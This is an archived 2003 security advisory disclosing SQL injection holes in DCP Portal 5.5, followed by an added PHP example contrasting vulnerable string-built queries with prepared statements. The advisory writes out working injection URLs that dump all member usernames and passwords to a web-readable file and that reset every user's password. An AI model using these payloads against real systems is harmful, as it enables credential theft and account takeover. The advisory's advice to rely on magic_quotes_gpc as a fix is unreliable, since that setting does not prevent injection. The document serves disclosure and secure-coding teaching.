dcpportal.txt

Date: 01 Oct 2003 00:00:00
Reported by: Lifo Fifo
Type: packetstorm
Source: packetstormsecurity.com

DCP Portal has multiple security holes; disable magic quotes, register globals for safety.

Advisory text

From: Lifo Fifo <[email protected]>
To: [email protected]
Subject: DCP Portal - 5.5 holes

Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.

All the files in the product don't check the integrity of variables. You can easily exploit this using some SQL injection techniques. For example, if you want to get the username/password of all the users, you can exploit advertiser.php.

Open it like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt

This is for Windows; if the web server is running on *nix, then you could enter something like,

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt

In these cases, you will need to enter the absolute path. For that, run the following

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path on the server if they have turned on display_errors in php.ini.

That's all! Notice that here we are using the UNION function in the query. For that, the host should be running MySQL version 4.x. Well, if it's not running 4.x, no problem, we have another file!

This time it's lostpassword.php.

Open it like,

http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'

This will really cause some damage. It will reset the password of everyone. Everyone will get as many mails as the number of users. And everyone's password will be the one provided in the last email.

I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even when magic_quotes_gpc is on.

Fix: Instead of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.

-lifofifo
http://www.hackingzone.org/
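As an added illustration (not code from DCP Portal or from the advisory), here is the pattern the advisory describes, a member lookup built by interpolating request values into SQL, beside the fix that does not depend on magic_quotes_gpc, a PDO prepared statement. It runs against an in-memory SQLite table with constructed rows; the table and column names are assumed from the advisory's UNION query, and the two lookup functions are hypothetical.

```php
<?php
// Added example, not DCP Portal code. SQLite in memory so it runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample data; table/column names assumed from the advisory's query.
$db->exec("CREATE TABLE dcp5_members (uid INTEGER, name TEXT, password TEXT, email TEXT)");
$db->exec("INSERT INTO dcp5_members VALUES
           (1, 'alice', 's3cret',  '[email protected]'),
           (2, 'bob',   'hunter2', '[email protected]')");

// Vulnerable pattern (hypothetical): request values interpolated straight into SQL.
// With magic_quotes_gpc off, the case the advisory warns about, nothing escapes the
// quote, so the WHERE clause is rewritten by whatever the client sends.
function lookupUnsafe(PDO $db, string $username, string $password): array {
    $sql = "SELECT uid, name FROM dcp5_members
            WHERE name = '$username' AND password = '$password'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern (hypothetical): a prepared statement. The input is bound as
// data, so a quote or an "or 1=1" fragment is compared literally against the
// password column instead of being parsed as SQL.
function lookupSafe(PDO $db, string $username, string $password): array {
    $stmt = $db->prepare("SELECT uid, name FROM dcp5_members
                          WHERE name = :u AND password = :p");
    $stmt->execute([':u' => $username, ':p' => $password]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The tautology fragment from the advisory's lostpassword.php example, used here
// only to show the difference in how the two functions treat it.
$payload = "fake' or 1=1--";
printf("interpolated query matched %d member(s)\n", count(lookupUnsafe($db, '1', $payload)));
printf("prepared statement matched %d member(s)\n", count(lookupSafe($db, '1', $payload)));
```

The interpolated query matches every member because the trailing comment marker discards the rest of the clause, while the prepared statement matches none; the prepared statement behaves the same whether magic_quotes_gpc is on or off, which is why it is the fix rather than the ini setting the advisory suggests.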
